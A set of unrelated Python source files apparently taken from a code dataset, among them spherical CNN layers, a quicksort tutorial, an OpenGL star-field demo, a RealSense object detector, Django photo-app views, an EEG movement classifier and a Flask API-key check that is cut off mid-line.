x[self.neigh_orders].view(len(x), 19*self.in_feats)\n \n out_features = self.weight(mat)\n return out_features\n \n\n \nclass pool_layer(nn.Module):\n \"\"\"\n The pooling layer on icosahedron discretized sphere using 1-ring filter\n \n Input: \n N x D tensor\n Return:\n ((N+6)/4) x D tensor\n \n \"\"\" \n\n def __init__(self, neigh_orders, pooling_type='mean'):\n super(pool_layer, self).__init__()\n\n self.neigh_orders = neigh_orders\n self.pooling_type = pooling_type\n \n def forward(self, x):\n \n num_nodes = int((x.size()[0]+6)/4)\n feat_num = x.size()[1]\n x = x[self.neigh_orders[0:num_nodes*7]].view(num_nodes, feat_num, 7)\n if self.pooling_type == \"mean\":\n x = torch.mean(x, 2)\n if self.pooling_type == \"max\":\n x = torch.max(x, 2)\n assert(x[0].size() == torch.Size([num_nodes, feat_num]))\n return x[0], x[1]\n \n assert(x.size() == torch.Size([num_nodes, feat_num]))\n \n return x\n \n \nclass upconv_layer(nn.Module):\n \"\"\"\n The transposed convolution layer on icosahedron discretized sphere using 1-ring filter\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x out_feats, tensor\n \n \"\"\" \n\n def __init__(self, in_feats, out_feats, upconv_top_index, upconv_down_index):\n super(upconv_layer, self).__init__()\n\n self.in_feats = in_feats\n self.out_feats = out_feats\n self.upconv_top_index = upconv_top_index\n self.upconv_down_index = upconv_down_index\n self.weight = nn.Linear(in_feats, 7 * out_feats)\n \n def forward(self, x):\n \n raw_nodes = x.size()[0]\n new_nodes = int(raw_nodes*4 - 6)\n x = self.weight(x)\n x = x.view(len(x) * 7, self.out_feats)\n x1 = x[self.upconv_top_index]\n assert(x1.size() == torch.Size([raw_nodes, self.out_feats]))\n x2 = x[self.upconv_down_index].view(-1, self.out_feats, 2)\n x = torch.cat((x1,torch.mean(x2, 2)), 0)\n assert(x.size() == torch.Size([new_nodes, self.out_feats]))\n return x\n\n\nclass upsample_interpolation(nn.Module):\n \"\"\"\n The upsampling layer on icosahedron discretized sphere using interpolation\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x in_feats, tensor\n \n \"\"\" \n\n def __init__(self, upsample_neighs_order):\n super(upsample_interpolation, self).__init__()\n\n self.upsample_neighs_order = upsample_neighs_order\n \n def forward(self, x):\n \n num_nodes = x.size()[0] * 4 - 6\n feat_num = x.size()[1]\n x1 = x[self.upsample_neighs_order].view(num_nodes - x.size()[0], feat_num, 2)\n x1 = torch.mean(x1, 2)\n x = torch.cat((x,x1),0)\n \n return x\n\n\nclass upsample_fixindex(nn.Module):\n \"\"\"\n The upsampling layer on icosahedron discretized sphere using fixed indices 0,\n padding new vertices with 0\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x in_feats, tensor\n \n \"\"\" \n def __init__(self, upsample_neighs_order):\n super(upsample_fixindex, self).__init__()\n\n self.upsample_neighs_order = upsample_neighs_order\n \n def forward(self, x):\n \n num_nodes = x.size()[0] * 4 - 6\n feat_num = x.size()[1]\n x1 = torch.zeros(num_nodes - x.size()[0], feat_num).cuda()\n x = torch.cat((x,x1),0)\n \n return x\n \n \nclass upsample_maxindex(nn.Module):\n \"\"\"\n The upsampling layer on icosahedron discretized sphere using max indices.\n \n Input: \n N x in_feats, tensor\n Return:\n ((Nx4)-6) x in_feats, tensor\n \n \"\"\" \n\n def __init__(self, num_nodes, neigh_orders):\n super(upsample_maxindex, self).__init__()\n\n self.num_nodes = num_nodes\n self.neigh_orders = neigh_orders\n \n def forward(self, x, max_index):\n \n raw_nodes, feat_num = x.size()\n assert(max_index.size() == x.size())\n x = x.view(-1) \n \n y = torch.zeros(self.num_nodes, feat_num).to(torch.device(\"cuda\"))\n column_ref = torch.zeros(raw_nodes, feat_num)\n for i in range(raw_nodes):\n column_ref[i,:] = i * 7 + max_index[i,:] \n column_index = self.neigh_orders[column_ref.view(-1).long()]\n column_index = torch.from_numpy(column_index).long()\n row_index = np.floor(np.linspace(0.0, float(feat_num), num=raw_nodes*feat_num))\n row_index[-1] = row_index[-1] - 1\n row_index = torch.from_numpy(row_index).long()\n y[column_index, row_index] = x\n \n return y\n\n\n \n","sub_path":"sphericalunet/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"423645750","text":"\"\"\"\n10.0 快速排序(Quick Sort)\n\n·取一个元素p(第一个元素),使元素p归位\n-->列表被p分成两部分,左边都比p小,右边都比p大\n-->递归完成排序\n·快速排序框架:\n def quick_sort(data, left, right):\n if left < right:\n mid = partition(data, left, right)\n quick_sort(data, left, mid - 1)\n quick_sort(data, mid + 1, right)\n·时间复杂度:O(nlogn)\n·快速排序的问题:最坏情况(e.g.倒序列表的情况O(n^2)),递归最大深度\n\n===============================================================================\n===============================================================================\n\"\"\"\n\n\n# ========== example ==========\ndef partition(li, left, right):\n tmp = li[left]\n while left < right:\n while left < right and li[right] >= tmp: # 从右边找比tmp小的数\n right -= 1 # 往左走一步\n li[left] = li[right] # 把右边的值写到左边的空位上\n print(li)\n while left < right and li[left] <= tmp:\n left += 1\n li[right] = li[left] # 把左边的值写到右边的空位上\n print(li)\n li[left] = tmp # 把tmp归位\n return left\n\n\ndef quick_sort(li, left, right):\n if left < right: # 至少两个元素\n mid = partition(li, left, right)\n quick_sort(li, left, mid - 1)\n quick_sort(li, mid + 1, right)\n\n\nli = [5, 7, 4, 6, 3, 1, 2, 9, 8]\nli2 = [7, 2, 8, 4, 6, 7, 5, 6, 4, 9]\n# print(li2)\npartition(li, 0, len(li) - 1)\n# quick_sort(li2, 0, len(li2) - 1)\nprint(li)\n","sub_path":"10 Quick Sort-快速排序.py","file_name":"10 Quick Sort-快速排序.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165955322","text":"#!/usr/bin/python3\r\n\r\n# Demonstrates point sprites\r\n# Ben Smith\r\n# benjamin.coder.smith@gmail.com\r\n#\r\n# based on pointsprites.cpp\r\n# OpenGL SuperBible\r\n# Program by Richard S. Wright Jr.\r\n\r\n\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nfrom OpenGL.GLU import *\r\n\r\nfrom PIL import Image\r\nimport time \r\n\r\nESCAPE = b'\\033'\r\n\r\n\r\n\r\nfrom math import cos, sin\r\n\r\nfrom random import randint\r\n\r\nimport sys\r\nsys.path.append(\"../shared\")\r\n\r\nfrom math3d import M3DVector2f\r\n\r\n\r\n# Array of small stars\r\nSMALL_STARS = 100\r\nvSmallStars = [M3DVector2f() for i in range (0, SMALL_STARS)]\r\n\r\nMEDIUM_STARS = 40\r\nvMediumStars = [M3DVector2f() for i in range (0, MEDIUM_STARS)]\r\n\r\nLARGE_STARS = 40\r\nvLargeStars = [M3DVector2f() for i in range (0, LARGE_STARS)]\r\n\r\nSCREEN_X = 800\r\nSCREEN_Y = 600\r\n\r\ndrawMode = 3\r\ntextureObjects = (GLuint * 2)()\r\n\r\ndef InitGL(Width, Height):\r\n\r\n # Turn off blending and all smoothing\r\n if drawMode == 1:\r\n glDisable(GL_BLEND)\r\n glDisable(GL_LINE_SMOOTH)\r\n glDisable(GL_POINT_SMOOTH)\r\n glDisable(GL_TEXTURE_2D)\r\n glDisable(GL_POINT_SPRITE)\r\n \r\n # Turn on antialiasing, and give hint to do the best\r\n # job possible.\r\n if drawMode == 2:\r\n \r\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\r\n glEnable(GL_BLEND)\r\n glEnable(GL_POINT_SMOOTH)\r\n glHint(GL_POINT_SMOOTH_HINT, GL_NICEST)\r\n glEnable(GL_LINE_SMOOTH)\r\n glHint(GL_LINE_SMOOTH_HINT, GL_NICEST)\r\n glDisable(GL_TEXTURE_2D)\r\n glDisable(GL_POINT_SPRITE)\r\n\r\n # Point Sprites\r\n elif drawMode == 3:\r\n glEnable(GL_BLEND)\r\n glBlendFunc(GL_SRC_COLOR, GL_ONE_MINUS_SRC_COLOR)\r\n glDisable(GL_LINE_SMOOTH)\r\n glDisable(GL_POINT_SMOOTH)\r\n glDisable(GL_POLYGON_SMOOTH)\r\n \r\n # Populate star list\r\n for i in range(0, SMALL_STARS):\r\n vSmallStars[i][0] = float(randint(0, SCREEN_X))\r\n vSmallStars[i][1] = float(randint(0, SCREEN_Y - 100))+100.0\r\n\r\n # Populate star list\r\n for i in range(0, MEDIUM_STARS):\r\n vMediumStars[i][0] = float(randint(0, SCREEN_X * 10))/10.0\r\n vMediumStars[i][1] = float(randint(0, SCREEN_Y - 100))+100.0\r\n\r\n # Populate star list\r\n for i in range(0, LARGE_STARS):\r\n vLargeStars[i][0] = float(randint(0, SCREEN_X * 10))/10.0\r\n vLargeStars[i][1] = float(randint(0, SCREEN_Y - 100) * 10.0)/ 10.0 +100.0\r\n \r\n # Black background\r\n glClearColor(0.0, 0.0, 0.0, 1.0 )\r\n\r\n # Set drawing color to white\r\n glColor3f(0.0, 0.0, 0.0)\r\n\r\n # Load our textures\r\n glGenTextures(2, textureObjects)\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[0])\r\n \r\n # Load this texture map\r\n glTexParameteri(GL_TEXTURE_2D, GL_GENERATE_MIPMAP, GL_TRUE)\r\n img = Image.open('star.png').convert(\"RGB\")\r\n raw_image = img.tobytes()\r\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img.width, img.height, 0, GL_RGB, GL_UNSIGNED_BYTE, raw_image)\r\n \r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR_MIPMAP_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\r\n\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[1])\r\n glTexParameteri(GL_TEXTURE_2D, GL_GENERATE_MIPMAP, GL_TRUE)\r\n img = Image.open('moon.png').convert(\"RGB\")\r\n raw_image = img.tobytes()\r\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, img.width, img.height, 0, GL_RGB, GL_UNSIGNED_BYTE, raw_image)\r\n \r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR_MIPMAP_LINEAR)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\r\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\r\n\r\n glTexEnvi(GL_POINT_SPRITE, GL_COORD_REPLACE, GL_TRUE)\r\n glTexEnvi(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)\r\n\r\n # Called to draw scene\r\ndef DrawGLScene():\r\n \r\n x = 700.0 # Location and radius of moon\r\n y = 500.0\r\n r = 50.0\r\n angle = 0.0 # Another looping variable\r\n\r\n # Clear the window\r\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\r\n \r\n # Everything is white\r\n glColor3f(1.0, 1.0, 1.0)\r\n \r\n if (drawMode == 3):\r\n glEnable(GL_POINT_SPRITE)\r\n glEnable(GL_TEXTURE_2D)\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[0])\r\n glEnable(GL_BLEND)\r\n \r\n # Draw small stars\r\n glPointSize(7.0)\r\n glBegin(GL_POINTS)\r\n for i in range(0, SMALL_STARS):\r\n glVertex2fv(vSmallStars[i])\r\n glEnd()\r\n \r\n # Draw medium sized stars\r\n glPointSize(12.0)\r\n glBegin(GL_POINTS)\r\n for i in range(0, MEDIUM_STARS):\r\n glVertex2fv(vMediumStars[i])\r\n glEnd()\r\n \r\n # Draw largest stars\r\n glPointSize(20.0)\r\n glBegin(GL_POINTS)\r\n for i in range(0, LARGE_STARS):\r\n glVertex2fv(vLargeStars[i])\r\n glEnd()\r\n \r\n \r\n glPointSize(120.0)\r\n if (drawMode == 3):\r\n glDisable(GL_BLEND)\r\n glBindTexture(GL_TEXTURE_2D, textureObjects[1])\r\n \r\n glBegin(GL_POINTS)\r\n glVertex2f(x, y)\r\n glEnd()\r\n \r\n glDisable(GL_TEXTURE_2D)\r\n glDisable(GL_POINT_SPRITE)\r\n\r\n # Draw distant horizon\r\n glLineWidth(3.5)\r\n glBegin(GL_LINE_STRIP)\r\n \r\n glVertex2f(0.0, 25.0)\r\n glVertex2f(50.0, 100.0)\r\n glVertex2f(100.0, 25.0)\r\n glVertex2f(225.0, 115.0)\r\n glVertex2f(300.0, 50.0)\r\n glVertex2f(375.0, 100.0)\r\n glVertex2f(460.0, 25.0)\r\n glVertex2f(525.0, 100.0)\r\n glVertex2f(600.0, 20.0)\r\n glVertex2f(675.0, 70.0)\r\n glVertex2f(750.0, 25.0)\r\n glVertex2f(800.0, 90.0)\r\n \r\n glEnd()\r\n\r\n glutSwapBuffers() \r\n \r\n \r\ndef ReSizeGLScene(w, h):\r\n # Prevent a divide by zero\r\n if(h == 0):\r\n h = 1\r\n \r\n # Set Viewport to window dimensions\r\n glViewport(0, 0, w, h)\r\n\r\n # Reset projection matrix stack\r\n glMatrixMode(GL_PROJECTION)\r\n glLoadIdentity()\r\n\r\n # Establish clipping volume (left, right, bottom, top, near, far)\r\n gluOrtho2D(0.0, SCREEN_X, 0.0, SCREEN_Y)\r\n\r\n\r\n # Reset Model view matrix stack\r\n glMatrixMode(GL_MODELVIEW)\r\n glLoadIdentity()\r\n \r\ndef keyPressed(key, x, y):\r\n if key == ESCAPE:\r\n glutDestroyWindow(window)\r\n sys.exit()\r\n\r\n \r\n# Main program entry point\r\nif __name__ == '__main__':\r\n\r\n glutInit()\r\n glutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_ALPHA | GLUT_DEPTH)\r\n glutInitWindowSize(640, 480)\r\n glutInitWindowPosition(0, 0)\r\n window = glutCreateWindow(\"Smoothing Out The Jaggies\")\r\n \r\n glutDisplayFunc(DrawGLScene)\r\n\r\n # Uncomment this line to get full screen.\r\n #glutFullScreen()\r\n \r\n #glutIdleFunc(DrawGLScene)\r\n #glutTimerFunc( int(1.0/60.0), update, 0)\r\n \r\n glutReshapeFunc(ReSizeGLScene)\r\n glutKeyboardFunc(keyPressed)\r\n # glutSpecialFunc (specialkeyPressed);\r\n\r\n # Initialize our window. \r\n InitGL(640, 480)\r\n \r\n # Start Event Processing Engine\t\r\n glutMainLoop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"chapt09/pointsprites.py","file_name":"pointsprites.py","file_ext":"py","file_size_in_byte":7741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"478261339","text":"\nfrom edgetpu.detection.engine import DetectionEngine\nfrom PIL import Image\nimport pyrealsense2 as rs\nimport numpy as np\nimport argparse\nimport imutils\nimport time \nimport sys\nimport cv2\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-m\", \"--model\", required=True, help=\"path to Tensorflow Lite object detection model\")\nap.add_argument(\"-l\", \"--labels\", required=True, help=\"path to labels file\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.3, help = \"Confidence threshold expressed as a decimal\")\nap.add_argument(\"-w\", \"--width\", type = int, default = 500, help = \"Size of image as it's inputed into the model\")\nap.add_argument(\"-i\", \"--info\", type = int, default = 0, help = \"Prints relevent runtime information in the console on startup\")\nargs = vars(ap.parse_args())\n\nlabels={}\n\nfor row in open(args[\"labels\"]):\n (classID, label) = row.strip().split(maxsplit=1)\n labels[int(classID)] = label.strip()\n\nprint(\"Tensorflow-Lite model loading...\")\nmodel = DetectionEngine(args[\"model\"])\n\nprint(\"Initializing Realsense...\")\npipeline = rs.pipeline()\nconfig = rs.config()\ndepth_resolution_x =640\ndepth_resolution_y =480\ncolor_resolution_x =640\ncolor_resolution_y =480\ndepth_fps =30\ncolor_fps =60\nconfig.enable_stream(rs.stream.depth, depth_resolution_x, depth_resolution_y, rs.format.z16, depth_fps) \nconfig.enable_stream(rs.stream.color, color_resolution_x, color_resolution_y, rs.format.bgr8, color_fps)\nprofile = pipeline.start(config)\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\n\nif args[\"info\"] > 0:\n print(\"Depth Input: \",depth_resolution_x,\"x\",depth_resolution_y,\"at\",depth_fps,\"fps\")\n print(\"Color Input: \",color_resolution_x,\"x\",color_resolution_y,\"at\",color_fps,\"fps\")\n\n#align_with = rs.stream.color\n#align = rs.align(align_with)\n\nstart_time = time.time()\nx = 1 # displays the frame rate every 1 second\ncounter = 0\n\n\nwhile True:\n ##wait for a new frame and then get the depth and color frame \n frames = pipeline.wait_for_frames() \n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue\n \n ##create numpy array of depth and color frames\n depth_image = np.asanyarray(depth_frame.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n ##resize image based upon argument and create a copy to annotate and display\n color_image = imutils.resize(color_image, width=args[\"width\"])\n orig = color_image\n #color_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)\n color_image = Image.fromarray(color_image)\n\n ##start a timer for inferencing time and feed the frame into the model \n start_inference = time.time()\n results = model.DetectWithImage(color_image, threshold=args[\"confidence\"],\n keep_aspect_ratio=True, relative_coord=False)\n end_inference = time.time()\n \n ##put a bounding box on the result in the copy image\n for r in results:\n bounding_box = r.bounding_box.flatten().astype(\"int\") #try changing r\n (startX, startY, endX, endY) = bounding_box #try changing startx etc\n label = labels[r.label_id]\n cv2.rectangle(orig, (startX, startY), (endX, endY),\n (0, 255, 0), 2)\n \n ##add a dot to the center of the bounding box\n centerX = int((startX - ((startX - endX)*0.5)))\n centerY = int((startY - ((startY - endY)*0.5)))\n cv2.circle(orig, (centerX, centerY), 1, (0, 255, 0), 2 )\n\n #-------Single Point-----------\n ##calculates depth of the center point of the bounding box\n depth = depth_image[centerY, centerX].astype(float)\n depth = depth * depth_scale\n #------------------------------\n \n #-----------Average------------\n ##calculates depth of the center point of the bounding box\n #depth_center = depth_image[centerY, centerX].astype(float)\n #depth_collection = depth_center + depth_image[(centerX+1), (centerY+1)].astype(float) + depth_image[(centerX+1), (centerY-1)].astype(float) + depth_image[(centerX-1), (centerY-1)].astype(float) + depth_image[(centerX-1), (centerY+1)].astype(float)\n #depth_average = depth_collection/5\n #depth = depth_average * depth_scale\n #print(depth)\n #------------------------------\n\n y = startY - 15 if startY - 15 > 15 else startY + 15\n text = \"{}: {:.2f}% {:.3f}\".format(label, r.score*100, depth) \n cv2.putText(orig, text, (startX,y),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0),2) #try changing font\n\n\n ##create the window to display the result\n cv2.namedWindow('Real Sense Object Detection', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('Real Sense Object Detection', orig)\n key = cv2.waitKey(1) & 0xFF\n\n if args[\"info\"] > 0:\n ##create counter for measuring inference time and frames per second\n counter += 1\n if (time.time() - start_time) > x:\n print(\"FPS: \", counter / (time.time() - start_time))\n fps = []\n fps.append(counter / (time.time() - start_time))\n inference_time = []\n inference_time.append(end_inference - start_inference)\n counter = 0\n start_time = time.time()\n\n if key == ord(\"q\") or key == 27:\n break\n\n##calculate the average FPS and inference time \nif args[\"info\"] > 0:\n fps_sum = 0\n for num in fps:\n fps_sum += num\n fps_average = fps_sum / len(fps)\n print(\"Average FPS:\",fps_average)\n\n inference_sum = 0\n for num in inference_time:\n inference_sum += num\n inference_average = inference_sum / len(inference_time)\n print(\"Average Inference Time:\",inference_average) \n\n \npipeline.stop()\n \n \n\n","sub_path":"Realsense_Object_Detection_Public.py","file_name":"Realsense_Object_Detection_Public.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"142161884","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^chat/$', views.index, name='index'),\n url(r'^save-theme/$', views.save_theme ,name=\"save_theme\"),\n url(r'^save-thumb/$', views.save_thumb, name=\"save_thumb\"),\n url(r'^(?P[^/]+)/$', views.room, name='room'),\n]","sub_path":"cms_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"221214827","text":"from Spiff_report2 import *\n\nclass Jason_spiff(Spiff_report):\n\tdef __init__(self, spiff_name, fname_eclipse, fname_master):\n\t\tsuper().__init__(spiff_name, fname_eclipse, fname_master)\n\tdef transform_eclipse(self, t_dict, key):\n\t\ttemp = t_dict[key].split(' ')\n\t\tif len(temp) == 1: t_dict[\"CatMatch\"] = temp[0]\n\t\tif temp[0] == \"JASON\": t_dict[\"CatMatch\"] = temp[1]\n\t\telse: t_dict[\"CatMatch\"] = temp[0]\n\t\treturn\n\tdef transform_master(self, t_dict, key):\n\t\ttemp = t_dict[key]\n\t\tt_dict['CatMatchM'] = temp\n\t\treturn\n\tdef cust_clean(self):\n\t\tfor i in range(0, len(self.e_data)): self.e_data.transform_index(i, 'DESC', self.transform_eclipse)\n\t\tfor i in range(0, len(self.m_data)): self.m_data.transform_index(i, 'PART_ID', self.transform_master)\n\tdef cust_match(self):\n\t\tfor i in range(0, len(self.e_data)):\n\t\t\ttemp = self.e_data.get_index(i)\n\t\t\tcatnum = temp[\"CatMatch\"]\n\t\t\tloc = self.m_data.search('CatMatchM', catnum)\n\t\t\tif loc < 0:\n\t\t\t\ttemp['Spiff Match'] = \"N/A\"\n\t\t\t\tcontinue\n\t\t\tspiff = self.m_data.get_index(loc)['Spiff']\n\t\t\ttemp['Spiff Match'] = spiff","sub_path":"Jason_spiff.py","file_name":"Jason_spiff.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125271251","text":"# import python modules\nimport sys\n\n# import external libraries\nimport numpy as np\nnp.set_printoptions(suppress=True)\n\n# import custom libraries\nfrom filters import *\nfrom fft_features import *\nfrom data_receive import *\nfrom models import *\n# from pi_bridge import *\n\n\ndef main():\n\tfilters = Filter()\n\ttransform = Transform()\n\tmodel = KerasModels()\n\t# pi = piConnectionServer()\n\n\twhile True:\n\t\tx = input(\"Enter 1 to start recording and press 'q' or 'Q' to exit: \")\n\t\tif x == '1':\n\t\t\tdata_getter = GanglionDataReceiver()\n\n\t\t\teeg_recording = data_getter.get_signal()\n\t\t\to1 = eeg_recording[0]\n\t\t\to2 = eeg_recording[1]\n\n\t\t\t# NOTCH WAS CALCULATED BUT WAS PASSED IMMEDIATELY TO BANDPASS SO IT WASNT VISIBLE. PLOTS ERROR\n\t\t\to1_notch = filters.notch_filter(o1)\n\t\t\to2_notch = filters.notch_filter(o2)\n\n\t\t\to1_filtered = filters.bp_filter(o1_notch)\n\t\t\to2_filtered = filters.bp_filter(o2_notch)\n\n\n\t\t\t# SAVING ARRAYS FOR PLOTTING\n\t\t\t# np.savez('alpha_front', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\n\t\t\t# np.savez('alpha_back', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\t\t\t\n\t\t\t# np.savez('alpha_left', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\n\t\t\t# np.savez('alpha_right', o1=o1, o2=o2, o1_notch=o1_notch, o2_notch=o2_notch, o1_filtered=o1_filtered, o2_filtered=o2_filtered)\n\n\t\t\t# Inputs are returned normalized in the range of [0, 1]. Check fft.py normalize()\n\t\t\to1_sum = transform.sum_fourier_trans(o1_filtered)\n\t\t\to2_sum = transform.sum_fourier_trans(o2_filtered)\n\n\t\t\t# append lists and then convert them to np array\n\t\t\tnn_input = np.asarray(o1_sum + o2_sum)\n\t\t\tnn_input.shape = (1, 8)\n\n\t\t\tpredictions = model.nn_model(nn_input)\n\t\t\tpredictions_list = [x.item() for x in predictions]\n\t\t\tpredicted_movement = predictions_list.index(max(predictions_list))\n\t\t\tif predicted_movement == 0:\n\t\t\t\tprint(predicted_movement, ' BACK')\n\t\t\t\t# pi.sendData('BACK')\n\t\t\telif predicted_movement == 1:\n\t\t\t\tprint(predicted_movement, ' FRONT')\n\t\t\t\t# pi.sendData('FRONT')\n\t\t\telif predicted_movement == 2:\n\t\t\t\tprint(predicted_movement, ' LEFT')\n\t\t\t\t# pi.sendData('LEFT')\n\t\t\telse:\n\t\t\t\tprint(predicted_movement, ' RIGHT')\n\t\t\t\t# pi.sendData('RIGHT')\n\n\t\telif x == 'q' or x == 'Q':\n\t\t\t# pi.sendData('q Q Entered. Exiting...')\n\t\t\t# pi.closeConnection()\n\t\t\tsys.exit()\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"computer_main.py","file_name":"computer_main.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"96243055","text":"from django.shortcuts import render, HttpResponseRedirect, HttpResponse\nfrom django.http import JsonResponse\nfrom django.views.generic import ListView, DetailView\nfrom .models import Posts, Comments\nfrom django.forms import ModelForm\nfrom django.views.generic.edit import CreateView, DeleteView, UpdateView\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.http import Http404\n\n# Create your views here.\n\n\nclass PostListView(ListView):\n\n model = Posts\n template_name = 'index.html'\n\n def get_queryset(self):\n\n queryset = super(PostListView, self).get_queryset()\n q = self.request.GET.get('query')\n\n if q:\n return queryset.filter(description__icontains=q.strip())\n elif self.kwargs.get('user_id'):\n return queryset.filter(user=self.kwargs['user_id'])\n else:\n return queryset\n\n def get_context_data(self, **kwargs):\n context = super(PostListView, self).get_context_data(**kwargs)\n context['form'] = CommentForm\n return context\n\n\nclass CommentForm(ModelForm):\n\n class Meta:\n model = Comments\n fields = ['author', 'comment']\n\n\nclass PostDetailView(DetailView):\n\n model = Posts\n template_name = 'post.html'\n\n def get_context_data(self, **kwargs):\n context = super(PostDetailView, self).get_context_data(**kwargs)\n context['form'] = CommentForm(initial={'post': self.object.pk}, hide_condition=True)\n context['comments'] = Comments.objects.filter(post=self.object.pk)\n return context\n\n\nclass CommentCreate(CreateView):\n\n model = Comments\n form_class = CommentForm\n template_name = 'index.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.post = Posts.objects.get(pk=self.kwargs['post_id'])\n obj.save()\n return HttpResponseRedirect('/')\n\n def get_context_data(self, **kwargs):\n context = super(CommentCreate, self).get_context_data(**kwargs)\n context['object_list'] = Posts.objects.all()\n return context\n\n def get_success_url(self):\n return reverse('home')\n\n\nclass PostForm(ModelForm):\n\n class Meta:\n model = Posts\n fields = ['photo', 'description']\n\n\nclass NewPostCreate(LoginRequiredMixin, CreateView):\n login_url = 'login'\n redirect_field_name = 'index.html'\n\n model = Posts\n form_class = PostForm\n template_name = 'newpost.html'\n\n def form_valid(self, form):\n obj = form.save(commit=False)\n obj.user = self.request.user\n obj.save()\n return HttpResponseRedirect('/')\n\n def get_context_data(self, **kwargs):\n context = super(NewPostCreate, self).get_context_data(**kwargs)\n context['object_list'] = Posts.objects.all()\n return context\n\n\ndef like_post(request):\n post_id = request.GET.get('post_id', None)\n like = 0\n if post_id:\n post = Posts.objects.get(id=int(post_id))\n if post is not None:\n like = post.like + 1\n post.like = like\n post.save()\n return HttpResponse(like)\n\n\ndef create_comment(request, post_id):\n\n new_comment = CommentForm(data=request.POST)\n response_data = {}\n\n if new_comment.is_valid():\n comment = new_comment.save(commit=False)\n comment.post = Posts.objects.get(id=post_id)\n comment.save()\n\n response_data['author'] = comment.author\n response_data['comment'] = comment.comment\n response_data['datetime'] = comment.datetime\n\n return JsonResponse(response_data)\n\n\nclass PostDelete(LoginRequiredMixin, DeleteView):\n\n model = Posts\n template_name = 'posts_confirm_delete.html'\n success_url = reverse_lazy('home')\n\n def get_object(self, queryset=None):\n\n obj = super(PostDelete, self).get_object()\n if not obj.user == self.request.user:\n raise Exception('Unauthenticated user!!!')\n return obj\n","sub_path":"fotogram_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"263595468","text":"import re\n\nimport connexion\nfrom flask import g\n\n\nfrom swagger_server.configuration.exceptions import Unauthorized\nfrom swagger_server.configuration.signal import unauthorized_hook\n\nchave_autenticacao = \"x-api-key\"\n\n\n\n\n\ndef before_request():\n g.username = \"\"\n\n allowed_urls = [\n \"/v2/ui\",\n \"/v2/ui/\",\n \"/v2/swagger.json\",\n \"/v2/ping\",\n \"/v2/ping/\",\n ]\n\n if connexion.request.method == 'OPTIONS':\n return\n\n print(f\"Verificando se a url precisa de autorizacao\")\n\n for allowed_url in allowed_urls:\n if re.match(allowed_url, connexion.request.path):\n print(f\"Url nao precisa de autorizacao\")\n return\n\n x_api_key = connexion.request.headers.get(\"x-api-key\")\n if x_api_key is None or x_api_key!=chave_autenticacao:\n 